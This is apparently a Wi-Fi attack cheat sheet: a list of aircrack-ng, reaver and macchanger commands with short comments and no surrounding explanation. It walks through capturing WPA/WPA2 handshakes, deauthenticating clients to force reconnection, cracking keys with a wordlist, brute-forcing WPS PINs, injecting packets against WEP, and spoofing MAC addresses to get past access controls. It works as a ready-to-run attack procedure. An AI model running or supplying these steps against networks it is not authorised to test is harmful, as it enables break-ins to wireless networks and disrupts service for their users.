Setup WiFi monitoring
$ airmon-ng start <interface>
# Start monitoring for access points
$ airodump-ng mon0
# If cracking WPA/WPA2, stop monitoring once handshake is captured
$ airodump-ng -c <channel> -d <BSSID> -w <CAPTURE FILE> mon0
Crack WPA/WPA2
# Send deauth to a specific client force handshake
$ aireplay-ng --deauth <n> -a <BSSID> -c <CLIENT MAC> mon0
# Send deauth to all client force handshake
$ aireplay-ng --deauth <n> -a <BSSID> mon0
# Crack key using wordlist
$ aircrack-ng -a 2 -w <WORDLSIT> <CAPTURE FILE>
Crack WPS
# Find WPS access points
$ wash -i mon0 # Find WPS access points
# Brute force access point
$ reaver -i mon0 -b <BSSID> -vv
# Stop/Restart Net Services
$ airmon-ng check kill
$ /etc/init.d/network-manager start
Crack WEP
Passively
$ aircrack-ng <Capture file>
Actively
# Send fake authentication
$ aireplay-ng -a <BSSID> --fakeauth 1 --ignore-negative-one mon0
# Start ARP replay
$ aireplay-ng -b <BSSID> --arpreplay mon0
# Change MAC address if not on ACL:
$ ifconfig mon0 down
$ macchanger -m <MAC> mon0
$ ifconfig mon0 up